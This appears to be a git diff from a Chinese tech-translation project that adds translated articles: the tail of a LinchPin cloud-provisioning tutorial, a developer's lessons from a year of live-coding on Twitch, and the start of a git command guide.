以前,有个名为 **linchpin_config.yml** 的文件。现在这个文件没有了,替换它的是一个 ini 形式的配置文件,称为 **linchpin.conf**。虽然这个文件可以被修改或放到别的地方,它可以放置在配置文件容易找到的库的路径中。在多数情况下,**linchpin.conf** 文件是不需要去修改的。
|
||||
|
||||
### 工作空间
|
||||
|
||||
工作空间是一个定义的文件系统路径,它是一个逻辑上的资源组。一个工作空间可以认为是一个特定环境、服务组、或其它逻辑组的一个单个点。它也可以是一个所有可管理资源的大的存储容器。
|
||||
|
||||
工作空间在命令行上使用 **--workspace (-w)** 选项去指定,随后是工作空间路径。它也可以使用环境变量(比如,bash 中的 **$WORKSPACE**)指定。默认工作空间是当前目录。
|
||||
|
||||
### 初始化 (init)
|
||||
|
||||
运行 **linchpin init** 将生成一个需要的目录结构,以及一个 **PinFile**、**topology**、和 **layout** 文件的示例:
|
||||
|
||||
```
|
||||
$ export WORKSPACE=/tmp/workspace
|
||||
$ linchpin init
|
||||
PinFile and file structure created at /tmp/workspace
|
||||
$ cd /tmp/workspace/
|
||||
$ tree
|
||||
.
|
||||
├── credentials
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── example-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── example-topology.yml
|
||||
```
|
||||
|
||||
在这个时候,一个可执行的 **linchpin up** 并且提供一个 **libvirt** 虚拟机,和一个名为 **linchpin-centos71** 的网络。一个库存(inventory)将被生成,并被放在 **inventories/libvirt.inventory** 目录中。它可以通过读取 **topologies/example-topology.yml** 和收集 **topology_name** 的值了解它。
|
||||
|
||||
### 做好准备 (linchpin up)
|
||||
|
||||
一旦有了一个 PinFile、拓扑、和一个可选的布局,它已经做好了准备。
|
||||
|
||||
我们使用 dummy 工具,因为用它去配置非常简单;它不需要任何额外的东西(认证、网络、等等)。dummy 提供创建一个临时文件,它表示配置的主机。如果临时文件没有任何数据,说明主机没有被配置,或者它已经被销毁了。
|
||||
|
||||
dummy 提供的树像这样:
|
||||
|
||||
```
|
||||
$ tree
|
||||
.
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── dummy-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── dummy-cluster.yml
|
||||
```
|
||||
|
||||
PinFile 也很简单;它指定了它的拓扑,并且可以为 **dummy1** 目标提供一个可选的布局:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
```
|
||||
|
||||
**dummy-cluster.yml** 拓扑文件是一个引用到提供的三个 **dummy_node** 类型的资源:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: "dummy_cluster" # topology name
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: "dummy"
|
||||
resource_group_type: "dummy"
|
||||
resource_definitions:
|
||||
-
|
||||
name: "web"
|
||||
type: "dummy_node"
|
||||
count: 3
|
||||
```
|
||||
|
||||
执行命令 **linchpin up** 将基于上面的 **topology_name**(在这个案例中是 **dummy_cluster**)生成 **resources** 和 **inventory** 文件。
|
||||
|
||||
```
|
||||
$ linchpin up
|
||||
target: dummy1, action: up
|
||||
|
||||
$ ls {resources,inventories}/dummy*
|
||||
inventories/dummy_cluster.inventory resources/dummy_cluster.output
|
||||
```
|
||||
|
||||
去验证 dummy 集群的资源,检查 **/tmp/dummy.hosts**:
|
||||
|
||||
```
|
||||
$ cat /tmp/dummy.hosts
|
||||
web-0.example.net
|
||||
web-1.example.net
|
||||
web-2.example.net
|
||||
```
|
||||
|
||||
Dummy 模块为假定的(或 dummy)供应提供了一个基本工具。OpenStack、AWS EC2、Google Cloud、和更多的关于 LinchPin 的详细情况,可以去看[示例][18]。
|
||||
|
||||
### 库存(Inventory)生成
|
||||
|
||||
作为上面提到的 PinFile 的一部分,可以指定一个 **layout**。如果这个文件被指定,并且放在一个正确的位置上,一个用于提供资源的 Ansible 的静态库存(inventory)文件将被自动生成:
|
||||
|
||||
```
|
||||
---
|
||||
inventory_layout:
|
||||
vars:
|
||||
hostname: __IP__
|
||||
hosts:
|
||||
example-node:
|
||||
count: 3
|
||||
host_groups:
|
||||
- example
|
||||
```
|
||||
|
||||
当 **linchpin up** 运行完成,资源文件将提供一个很有用的详细信息。特别是,插入到静态库存(inventory)的 IP 地址或主机名:
|
||||
|
||||
```
|
||||
[example]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
|
||||
[all]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
```
|
||||
|
||||
### 卸载 (linchpin destroy)
|
||||
|
||||
LinchPin 也可以执行一个资源卸载。一个卸载动作一般认为资源是已经配置好的;然而,因为 Ansible 是幂等的(idempotent),**linchpin destroy** 将仅去检查确认资源是启用的。如果这个资源已经是启用的,它将去卸载它。
|
||||
|
||||
命令 **linchpin destroy** 也将使用资源和/或拓扑文件去决定合适的卸载过程。
|
||||
|
||||
**dummy** Ansible 角色不使用资源,卸载期间仅有拓扑:
|
||||
|
||||
```
|
||||
$ linchpin destroy
|
||||
target: dummy1, action: destroy
|
||||
|
||||
$ cat /tmp/dummy.hosts
|
||||
-- EMPTY FILE --
|
||||
```
|
||||
|
||||
在暂时的资源上,卸载功能有一些限制,像网络、存储、等等。网络资源被用于多个云实例是可能的。在这种情况下,执行一个 **linchpin destroy** 不能卸载某些资源。这取决于每个供应商的实现。查看每个[供应商][19]的具体实现。
|
||||
|
||||
### LinchPin 的 Python API
|
||||
|
||||
在 **linchpin** 命令行中实现的功能大多数已经被写成了 Python API。这个 API,虽然不完整,但它已经成为 LinchPin 工具的至关重要的组件。
|
||||
|
||||
这个 API 由下面的三个包组成:
|
||||
|
||||
* **linchpin**
|
||||
|
||||
* **linchpin.cli**
|
||||
|
||||
* **linchpin.api**
|
||||
|
||||
这个命令行工具是基于 **linchpin** 包来管理的。它导入了 **linchpin.cli** 模块和类,它是 **linchpin.api** 的子类。它的目的是为了允许使用 **linchpin.api** 的 LinchPin 的可能的其它实现,比如像计划的 RESTful API。
|
||||
|
||||
更多信息,去查看 [Python API library documentation on Read the Docs][20]。
|
||||
|
||||
### Hooks
|
||||
|
||||
LinchPin 1.0 的其中一个大的变化是转向 hooks。hooks 的目标是在 **linchpin** 运行期间,允许配置使用外部资源。目前情况如下:
|
||||
|
||||
* **preup**: 在准备拓扑资源之前运行
|
||||
|
||||
* **postup**: 在准备拓扑资源之后运行,并且生成可选的库存(inventory)
|
||||
|
||||
* **predestroy**: 卸载拓扑资源之前运行
|
||||
|
||||
* **postdestroy**: 卸载拓扑资源之后运行
|
||||
|
||||
在每种情况下,这些 hooks 允许去运行外部脚本。存在几种类型的 hooks,包括一个定制的叫做 _Action Managers_。这是一个内置的动作管理的列表:
|
||||
|
||||
* **shell**: 允许任何的内联(inline)shell 命令,或者一个可运行的 shell 脚本
|
||||
|
||||
* **python**: 运行一个 Python 脚本
|
||||
|
||||
* **ansible**: 运行一个 Ansible playbook,允许通过一个 **vars_file** 和 **extra_vars** 表示为一个 Python 字典
|
||||
|
||||
* **nodejs**: 运行一个 Node.js 脚本
|
||||
|
||||
* **ruby**: 运行一个 Ruby 脚本
|
||||
|
||||
一个 hook 是绑定到一个特定的目标,并且每个目标使用时必须重新声明。将来,hooks 将可能是全局的,然后它们在每个目标的 **hooks** 节更简单地进行命名。
|
||||
|
||||
### 使用 hooks
|
||||
|
||||
描述 hooks 是非常简单的,理解它们强大的功能却并不简单。这个特性的存在是为了给用户提供灵活的功能,而这些功能开发着可能并不会去考虑。对于实例,在运行其它的 hook 之前,这个概念可能会带来一个简单的方式去 ping 一套系统。
|
||||
|
||||
更仔细地去研究 _工作空间_ ,你可能会注意到 **hooks** 目录,让我们看一下这个目录的结构:
|
||||
|
||||
```
|
||||
$ tree hooks/
|
||||
hooks/
|
||||
├── ansible
|
||||
│ ├── ping
|
||||
│ │ └── dummy_ping.yaml
|
||||
└── shell
|
||||
└── database
|
||||
├── init_db.sh
|
||||
└── setup_db.sh
|
||||
```
|
||||
|
||||
在任何情况下,hooks 都可以在 **PinFile** 中使用,展示如下:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
hooks:
|
||||
postup:
|
||||
- name: ping
|
||||
type: ansible
|
||||
actions:
|
||||
- dummy_ping.yaml
|
||||
- name: database
|
||||
type: shell
|
||||
actions:
|
||||
- setup_db.sh
|
||||
- init_db.sh
|
||||
```
|
||||
|
||||
那是基本概念,这里有三个 postup 动作去完成。Hooks 是从上到下运行的,因此,Ansible **ping** 任务将首先运行,紧接着是两个 shell 任务, **setup_db.sh** 和 **init_db.sh**。假设 hooks 运行成功。将发生一个系统的 ping,然后,一个数据库被安装和初始化。
|
||||
|
||||
### 认证的驱动程序
|
||||
|
||||
在 LinchPin 的最初设计中,开发者决定去在 Ansible playbooks 中管理认证;然而,移到更多的 API 和命令行驱动的工具后,意味着认证将被置于 playbooks 库之外,并且还可以根据需要去传递认证值。
|
||||
|
||||
### 配置
|
||||
|
||||
让用户使用驱动程序提供的认证方法去完成这个任务。对于实例,如果对于 OpenStack 调用的拓扑,标准方法是可以使用一个 yaml 文件,或者类似于 **OS_** 前缀的环境变量。一个 clouds.yaml 文件是一个 profile 文件的组成部分,它有一个 **auth** 节:
|
||||
|
||||
```
|
||||
clouds:
|
||||
default:
|
||||
auth:
|
||||
auth_url: http://stack.example.com:5000/v2.0/
|
||||
project_name: factory2
|
||||
username: factory-user
|
||||
password: password-is-not-a-good-password
|
||||
```
|
||||
|
||||
更多详细信息在 [OpenStack documentation][21]。
|
||||
|
||||
这个 clouds.yaml 或者在位于 **default_credentials_path** (比如,~/.config/linchpin)中和拓扑中引用的任何其它认证文件:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: openstack-test
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: linchpin
|
||||
resource_group_type: openstack
|
||||
resource_definitions:
|
||||
- name: resource
|
||||
type: os_server
|
||||
flavor: m1.small
|
||||
image: rhel-7.2-server-x86_64-released
|
||||
count: 1
|
||||
keypair: test-key
|
||||
networks:
|
||||
- test-net2
|
||||
fip_pool: 10.0.72.0/24
|
||||
credentials:
|
||||
filename: clouds.yaml
|
||||
profile: default
|
||||
```
|
||||
|
||||
**default_credentials_path** 可以通过修改 **linchpin.conf** 被改变。
|
||||
|
||||
拓扑在底部包含一个新的 **credentials** 节。使用 **openstack**、**ec2**、和 **gcloud** 模块,也可以去指定类似的凭据。认证驱动程序将查看给定的 _名为_ **clouds.yaml** 的文件,并搜索名为 **default** 的 _配置_。
|
||||
|
||||
假设认证被找到并被加载,准备将正常继续。
|
||||
|
||||
### 简化
|
||||
|
||||
虽然 LinchPin 可以完成复杂的拓扑、库存布局、hooks、和认证管理,但是,终极目标是简化。通过使用一个命令行界面的简化,除了提升已经完成的 1.0 版的开发者体验外,LinchPin 将持续去展示复杂的配置可以很简单地去管理。
|
||||
|
||||
### 社区的成长
|
||||
|
||||
在过去的一年中,LinchPin 的社区现在已经有了 [邮件列表][22]和一个 IRC 频道(#linchpin on chat.freenode.net,而且在 [GitHub][23] 中我们很努力地管理它。
|
||||
|
||||
在过去的一年里,社区成员已经从 2 位核心开发者增加到大约 10 位贡献者。更多的人持续参与到项目中。如果你对 LinchPin 感兴趣,可以给我们写信、在 GitHub 上提问,加入 IRC,或者给我们发邮件。
|
||||
|
||||
_这篇文章是基于 Clint Savage 在 OpenWest 上的演讲 [Introducing LinchPin: Hybrid cloud provisioning using Ansible][7] 整理的。[OpenWest][8] 将在 2017 年 7 月 12-15 日在盐城湖市举行。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
作者简介:
|
||||
|
||||
Clint Savage - 工作于 Red Hat 是一位负责原子项目(Project Atomic)的高级软件工程师。他的工作是为 Fedora、CentOS、和 Red Hat Enterprise Linux(RHEL)提供自动原子服务器构建。
|
||||
|
||||
-------------
|
||||
|
||||
via: https://opensource.com/article/17/6/linchpin
|
||||
|
||||
作者:[Clint Savage][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/herlo
|
||||
[1]:https://opensource.com/resources/cloud?src=cloud_resource_menu1
|
||||
[2]:https://opensource.com/resources/what-is-openstack?src=cloud_resource_menu2
|
||||
[3]:https://opensource.com/resources/what-is-kubernetes?src=cloud_resource_menu3
|
||||
[4]:https://opensource.com/16/12/yearbook-why-operating-system-matters?src=cloud_resource_menu4
|
||||
[5]:https://opensource.com/business/16/10/interview-andy-cathrow-anchore?src=cloud_resource_menu5
|
||||
[6]:https://opensource.com/article/17/6/linchpin?rate=yx4feHOc5Kf9gaZe5S4MoVAmf9mgtociUimJKAYgwZs
|
||||
[7]:https://www.openwest.org/custom/description.php?id=166
|
||||
[8]:https://www.openwest.org/
|
||||
[9]:https://opensource.com/user/145261/feed
|
||||
[10]:https://www.flickr.com/photos/internetarchivebookimages/14587478927/in/photolist-oe2Gwy-otuvuy-otus3U-otuuh3-ovwtoH-oe2AXD-otutEw-ovwpd8-oe2Me9-ovf688-oxhaVa-oe2mNh-oe3AN6-ovuyL7-ovf9Kt-oe2m4G-ovwqsH-ovjfJY-ovjfrU-oe2rAU-otuuBw-oe3Dgn-oe2JHY-ovfcrF-oe2Ns1-ovjh2N-oe3AmK-otuwP7-ovwrHt-ovwmpH-ovf892-ovfbsr-ovuAzN-ovf3qp-ovuFcJ-oe2T3U-ovwn8r-oe2L3T-oe3ELr-oe2Dmr-ovuyB9-ovuA9s-otuvPG-oturHA-ovuDAh-ovwkV6-ovf5Yv-ovuCC5-ovfc2x-oxhf1V
|
||||
[11]:http://sexysexypenguins.com/posts/introducing-linch-pin/
|
||||
[12]:http://linch-pin.readthedocs.io/en/develop/
|
||||
[13]:https://opensource.com/resources/cloud
|
||||
[14]:http://click.pocoo.org/
|
||||
[15]:https://opensource.com/resources/python
|
||||
[16]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[17]:http://docs.ansible.com/ansible/playbooks.html
|
||||
[18]:https://github.com/CentOS-PaaS-SIG/linchpin/tree/develop/linchpin/examples/topologies
|
||||
[19]:https://github.com/CentOS-PaaS-SIG/linch-pin/tree/develop/linchpin/provision/roles
|
||||
[20]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[21]:https://docs.openstack.org/developer/python-openstackclient/configuration.html
|
||||
[22]:https://www.redhat.com/mailman/listinfo/linchpin
|
||||
[23]:https://github.com/CentOS-PaaS-SIG/linch-pin/projects/4
|
||||
[24]:https://opensource.com/users/herlo
|
@ -0,0 +1,161 @@
|
||||
我在 Twitch 平台直播编程的第一年
|
||||
============================================================
|
||||
去年 7 月我进行了第一次直播。不像大多数人那样在 Twitch 上进行游戏直播,我想直播的内容是我利用个人时间进行的开源工作。我对 NodeJS 硬件库有一定的研究(其中大部分是靠我自学的)。考虑到我已经在 Twitch 上有了一个直播间,为什么不再建一个更小更专业的直播间,比如使用 <ruby>JavaScript 驱动硬件<rt>JavaScript powered hardware</rt></ruby> 来建立直播间 :) 我注册了 [我自己的频道][1] ,从那以后我就开始定期直播。
|
||||
|
||||
我当然不是第一个这么做的人。[Handmade Hero][2] 是我最早看到的几个在线直播编程的程序员之一。很快这种直播方式被 Vlambeer 发扬光大,他在 Twitch 的 [Nuclear Throne live][3] 直播间进行直播。我对 Vlambeer 尤其着迷。
|
||||
|
||||
我的朋友 [Nolan Lawson][4] 让我 _真正开始做_ 这件事,而不只是单纯地 _想要做_ 。我看了他 [在周末直播开源工作][5] ,做得棒极了。他解释了他当时做的每一件事。每一件事。回复 GitHub 上的 <ruby>问题<rt>issues</rt></ruby> ,鉴别 bug ,在 <ruby>分支<rt>branches</rt></ruby> 中调试程序,你知道的。这令我着迷,因为 Nolan 使他的开源库得到了广泛的使用。他的开源生活和我的完全不一样。
|
||||
|
||||
你甚至可以看到我在他视频下的评论:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*tm8xC8CJV9ZimCCI.png)
|
||||
|
||||
我大约在一周或更久之后建好了自己的 Twitch 频道,并摸清了 OBS 的使用方法,随后开始了自己的直播。我当时用的是 [Avrgirl-Arduino][6] ,现在我依然经常用它直播。第一次直播十分粗糙。我前一天晚上排练得很晚,但直播时我依然很紧张。
|
||||
|
||||
那个星期六我极少的几个听众给了我很大的鼓舞,因此我坚持了下去。现在我有了超过一千个听众,他们中的一些人形成了一个可爱的小团体,他们会定期观看我的直播,我称呼他们为 “noopkat 家庭” 。
|
||||
|
||||
我们很开心。我想称呼这个即时编程部分为“多玩家在线组队编程”。我真的被他们每个人的热情和才能触动了。一次,一个团体成员指出我的 Arduino 开发板没有连接上软件,因为板子上的芯片丢了。这真是最有趣的时刻之一。
|
||||
|
||||
我经常暂停直播,检查我的收件箱,看看有没有人对我提过的,不再有时间完成的工作发起 <ruby>拉取请求<rt>pull request</rt></ruby> 。感谢我 Twitch 社区对我的帮助和鼓励。
|
||||
|
||||
我很想聊聊 Twitch 直播给我带来的好处,但它的内容太多了,我应该会在我下一个博客里介绍。我在这里想要分享的,是我学习的关于如何自己实现直播编程的课程。最近几个开发者问我怎么开始自己的直播,因此我在这里想大家展示我给他们的建议!
|
||||
|
||||
首先,我在这里贴出一个给过我很大帮助的教程 [“Streaming and Finding Success on Twitch”][7] 。它专注于 Twitch 与游戏直播,但也有很多和我们要做的东西相关的部分。我建议首先阅读这个教程,然后再考虑一些建立直播频道的细节(比如如何选择设备和软件)。
|
||||
|
||||
下面我列出我自己的配置。这些配置是从我多次的错误经验中总结出来的,其中要感谢我的直播同行的智慧与建议(对,你们知道就是你们!)。
|
||||
|
||||
### 软件
|
||||
|
||||
有很多免费的直播软件。我用的是 [Open Broadcaster Software (OBS)][8] 。它适用于大多数的平台。我觉得它十分直观且易于入门,但掌握其他的进阶功能则需要一段时间的学习。学好它你会获得很多好处!这是今天我直播时 OBS 的桌面截图(点击查看大图):
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*s4wyeYuaiThV52q5.png)
|
||||
|
||||
你直播时需要在不用的“场景”中进行切换。一个“场景”是多个“素材”通过堆叠和组合产生的集合。一个“素材”可以是照相机,麦克风,你的桌面,网页,动态文本,图片等等。 OBS 是一个很强大的软件。
|
||||
|
||||
最上方的桌面场景是我编程的环境,我直播的时候主要停留在这里。我使用 iTerm 和 vim ,同时打开一个可以切换的浏览器窗口来查阅文献或在 GitHub 上分类检索资料。
|
||||
|
||||
底部的黑色长方形是我的网络摄像头,人们可以通过这种个人化的连接方式来观看我工作。
|
||||
|
||||
我的场景中有一些“标签”,很多都与状态或者顶栏信息有关。顶栏只是添加了个性化信息,它在直播时是一个很好的连续性素材。这是我在 [GIMP][9] 里制作的图片,在你的场景里它会作为一个素材来加载。一些标签是从文本文件里添加的动态内容(例如最新粉丝)。另一个标签是一个 [custom one I made][10] ,它可以展示我直播的房间的动态温度与湿度。
|
||||
|
||||
我还在我的场景里设置了“闹钟”,当有人粉了我或者给了打赏,它会显示在最前方。我使用 [Stream Labs][11] 网络服务来实现它,将它作为一个浏览器网页素材引进我的场景。 Stream Labs 也会在顶栏里给出我最新粉丝的动态信息。
|
||||
|
||||
我直播的时候,也会使用一个备用场景:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*cbkVjKpyWaWZLSfS.png)
|
||||
|
||||
当我输入密码和 API keys 的时候,我另外需要一个场景。它会在网络摄像头里展示我,但是将我的桌面用一个娱乐页面隐藏起来,这样我可以做一些私密的工作:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*gbhowQ37jr3ouKhL.png)
|
||||
|
||||
正如你看到的,我直播的时候没有把窗口填的太满,但我让我的观众尽可能多地看到我的内容。
|
||||
|
||||
但现在有一个现实的秘密:我使用 OBS 来安排我屏幕的底部和右侧,同时视频保持了 Twitch 要求的长宽比。这让我有了空间在底部查看我的事件(订阅数等),同时在右侧观看和回复我的频道聊天室。 Twitch 允许新窗口“弹出”聊天室,这很有用。
|
||||
|
||||
这是我完整的桌面看起来的样子:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*sENLkp3Plh7ZTjJt.png)
|
||||
|
||||
我几个月前开始做这个,还没有回顾过。我甚至不确定我的观众们有没有意识到我进行的这些精心的设置。我想他们可能会把“我可以看到每个东西”视作理所应当,而事实上我常常忙于敲代码,而看不到正在直播的东西!
|
||||
|
||||
你可能想知道为什么我只用一个显示器。这是因为两个显示器在我直播的时候太难以管理了。我很快意识到这一点,并且恢复了单屏。
|
||||
|
||||
### 硬件
|
||||
|
||||
我从使用便宜的器材开始,当我意识到我会长期坚持直播之后,才将他们逐渐换成更好的。开始的时候尽量使用你现有的器材,即使是只用电脑内置的摄像头与麦克风。
|
||||
|
||||
现在我使用 Logitech Pro C920 网络摄像头,和一个固定有支架的 Blue Yeti 麦克风。花费是值得的。我直播的质量完全不同了。
|
||||
|
||||
我使用大屏显示器(27"),因为我之前说的,使用两个屏幕对我来说不方便。我常常错过聊天,因为我经常不检查我的第二屏幕。你可能觉得使用两个屏幕很方便,但对我来说,把所有东西放在一个屏幕上有利于我对所有事情保持注意力。
|
||||
|
||||
这基本上就是硬件部分的大部分内容了。我没有使用复杂的设置。
|
||||
|
||||
如果你感兴趣,我的桌面看起来不错,除了刺眼的麦克风:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*EyRimlrHNEKeFmS4.jpg)
|
||||
|
||||
### 建议
|
||||
|
||||
最后这里有一些我通过实践得出的一般性建议,这使我的直播从整体来看变得更好,更有趣。
|
||||
|
||||
#### 布告板
|
||||
|
||||
花点时间建立一个好的布告版。布告板是位于每个人频道底部的小内容框。我把它们看作新的个人空间窗口(真的)。理想的布告板可以有类似于聊天规则,有关直播内容的信息,你使用的电脑和设备,你最喜欢的猫的种类,等等这样的东西。任何关于个人形象的内容都可以。我们可以看看其他人(尤其是热播播主)的理想的布告板是什么样的!
|
||||
|
||||
一个我的布告板的例子:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*HlLs6xlnJtPwN4D6.png)
|
||||
|
||||
#### 聊天
|
||||
|
||||
聊天真的很重要。你可能会被中途观看你直播的人一遍又一遍地问同样的问题,如果可以像现实生活中那样聊天那样会很方便。“你正在做什么?”是我敲代码的时候别人最常问我的问题。我用 [Nightbot][12] 设置了一个聊天快捷命令。当你输入一些像 _whatamidoing_(我正在做什么) 这样的单词时,会自动给出我事先设好的解释。
|
||||
|
||||
当人们问问题或者给出一些有趣的评论时,要回复他们!和他们说谢谢,说他们的 Twitch 用的很好,他们会感谢你的关心和认可。一开始的时候很难对这些都保持注意力,但你做得多了之后,你会发现同时做这几件事变得更容易了。尝试着每两分钟就花几秒去关注聊天室。
|
||||
|
||||
当你编程的时候,_解释你正在做的事_ 。多说点。开开玩笑。即使我碰到了麻烦,我也会说:“哦,糟糕,我忘了这个方法怎么用了,我 Google 一下看看”。人们一般都很友好,有时他们还会和你一起寻找解决的办法。这很有趣,让人们一直看着你。
|
||||
|
||||
如果播主一直安静地坐在那敲代码,不去聊天,也不管他新粉丝的信息,我会很快对他失去兴趣。
|
||||
|
||||
很可能你 99% 的观众都很友好,并且都有好奇心。我偶尔还是会碰到挑衅的人,但 Twitch 提供的检查工具可以有效避免这种情况。
|
||||
|
||||
#### 准备时间
|
||||
|
||||
尽量将你的配置“自动化”。我的终端是 iTerm ,它可以让你保存窗口排列和字体大小的配置,这样你以后就可以再现这些配置。我有一个直播时的配置和一个不直播时的配置,这非常省事。我输入一个命令,所有东西就都在合适的位置并保持最完美的尺寸,并可以使用了。
|
||||
|
||||
还有其他的应用可以用来自动化你的窗口位置,看看有没有对你有用的。
|
||||
|
||||
让你的字体在终端和编辑器中尽可能的大,这样所有人都能看清。
|
||||
|
||||
#### 定期直播
|
||||
|
||||
让你的日程表更有规律。我一周只直播一次,但总是在同一时间。如果你临时有事不能在你平常直播的时间直播,要让人们知道。这让我保持了一些固定观众。一些人喜欢固定的时间,这就像和朋友在一起一样。你和你的社区在一个社交圈子里,所以要像对待朋友一样对待他们。
|
||||
|
||||
我想要提高我更新直播的频率,但我知道因为旅游的缘故我不能适应超过一周一次的直播频率。我正在尝试找到一种可以让我在路上也能高质量地直播的方法。或许可以临时将我聊天和写代码的过程保存起来,周末直播的时候再放出来。我仍然在探索这些办法!
|
||||
|
||||
#### 紧张心理
|
||||
|
||||
当你即将开始的时候,你会感觉很奇怪,不适应。你会在人们看着你写代码的时候感到紧张。这很正常!尽管我之前有过公共演说的经历,我一开始的时候还是感到陌生而不适应。我感觉我无处可藏,这令我害怕。我想:“大家可能都觉得我的代码很糟糕,我是一个糟糕的开发者。”这是一个困扰了我 _整个职业生涯_ 的想法,对我来说不新鲜了。我知道带着这些想法,我不能在发布到 GitHub 之前仔细地再检查一遍代码,而这样做更有利于我保持我作为开发者的声誉。
|
||||
|
||||
我从 Twitch 直播中发现了很多关于我代码风格的东西。我知道我的风格绝对是“先让它跑起来,然后再考虑可读性,然后再考虑运行速度”。我不再在前一天晚上提前排练好直播的内容(一开始的三四次直播我都是这么做的),所以我在 Twitch 上写的代码是相当粗糙的,我还得保证它们运行起来没问题。当我不看别人的聊天和讨论的时候,我可以写出我最好的代码,这样是没问题的。但我总会忘记我使用过无数遍的方法的名字,而且每次直播的时候都会犯“愚蠢的”错误。一般来说,这不是一个让你能达到你最好状态的生产环境。
|
||||
|
||||
我的 Twitch 社区从来不会因为这个苛求我,反而是他们帮了我很多。他们理解我正同时做着几件事,而且真的给了很多务实的意见和建议。有时是他们帮我找到了解决方法,有时是我要向他们解释为什么他们的建议不适合解决这个问题。这真的很像一般意义的组队编程!
|
||||
|
||||
我想这种“不管重要不重要,什么都说”的情况对于直播这种媒介来说是一种优势,而不是劣势。它让我想的更多。理解一个观念很重要,那就是没有完美的程序员,也没有完美的代码。对于一个新手程序员来说这是令人耳目一新的经历,对我这个老手来说却是微不足道的。
|
||||
|
||||
### 总结
|
||||
|
||||
如果你想过在 Twitch 上直播,我希望你试一下!如果你想知道怎么迈出第一步,我希望这篇博客可以帮的到你。
|
||||
|
||||
如果你周日想要加入我的直播,你可以 [订阅我的 Twitch 频道][13] :)
|
||||
|
||||
最后我想说一下,我个人十分感谢 [Mattias Johansson][14] 在我早期开始直播的时候给我的建议和鼓励。他的 [FunFunFunction YouTube channel][15] 也是一个令人激动的定期直播频道。
|
||||
|
||||
另:许多人问过我的键盘和其他工作设备是什么样的, [这是我使用的器材的完整列表][16] 。感谢关注!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.freecodecamp.org/lessons-from-my-first-year-of-live-coding-on-twitch-41a32e2f41c1
|
||||
|
||||
作者:[ Suz Hinton][a]
|
||||
译者:[lonaparte](https://github.com/lonaparte)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.freecodecamp.org/@suzhinton
|
||||
[1]:https://www.twitch.tv/noopkat
|
||||
[2]:https://www.twitch.tv/handmade_hero
|
||||
[3]:http://nuclearthrone.com/twitch/
|
||||
[4]:https://twitter.com/nolanlawson
|
||||
[5]:https://www.youtube.com/watch?v=9FBvpKllTQQ
|
||||
[6]:https://github.com/noopkat/avrgirl-arduino
|
||||
[7]:https://www.reddit.com/r/Twitch/comments/4eyva6/a_guide_to_streaming_and_finding_success_on_twitch/
|
||||
[8]:https://obsproject.com/
|
||||
[9]:https://www.gimp.org/
|
||||
[10]:https://github.com/noopkat/study-temp
|
||||
[11]:https://streamlabs.com/
|
||||
[12]:https://beta.nightbot.tv/
|
||||
[13]:https://www.twitch.tv/noopkat
|
||||
[14]:https://twitter.com/mpjme
|
||||
[15]:https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q
|
||||
[16]:https://gist.github.com/noopkat/5de56cb2c5917175c5af3831a274a2c8
|
@ -0,0 +1,170 @@
|
||||
GIT 命令"从初学到专业"完整进阶指南
|
||||
===========
|
||||
|
||||
在[之前的教程][1]中,我们已经学习了在机器上安装 git。本教程,我们将讨论如何使用 git,比如与 git 一起使用的各种命令。所以我们开始吧,
|
||||
(**推荐阅读:[如何在 Linux 上安装 GIT (Ubuntu 和 CentOS)][1]**)
|
||||
### 设置用户信息
|
||||
这应该是安装完 git 的第一步。我们将添加用户信息 (用户名和邮箱),所以当我们提交代码时,会产生带有用户信息的提交信息,这使得跟踪提交过程变得更容易。为了添加用户信息,命令是 `git config`,
|
||||
```
|
||||
$ git config --global user.name "Daniel"
|
||||
$ git config --global user.email "dan.mike@xyz.com"
|
||||
```
|
||||
添加完用户信息之后,通过运行下面命令,我们将检查这些信息是否成功更新,
|
||||
```
|
||||
$ git config --list
|
||||
```
|
||||
并且我们应该能够看到输出的用户信息。
|
||||
(**我们也应该读一下:[使用 CRONTAB 来安排重要的工作][3]**)
|
||||
### GIT 命令
|
||||
#### 新建一个仓库
|
||||
为了建立一个新仓库,运行如下命令,
|
||||
```
|
||||
$ git init
|
||||
```
|
||||
#### 查找一个仓库
|
||||
为了查找一个仓库,命令如下,
|
||||
```
|
||||
$ git grep "repository"
|
||||
```
|
||||
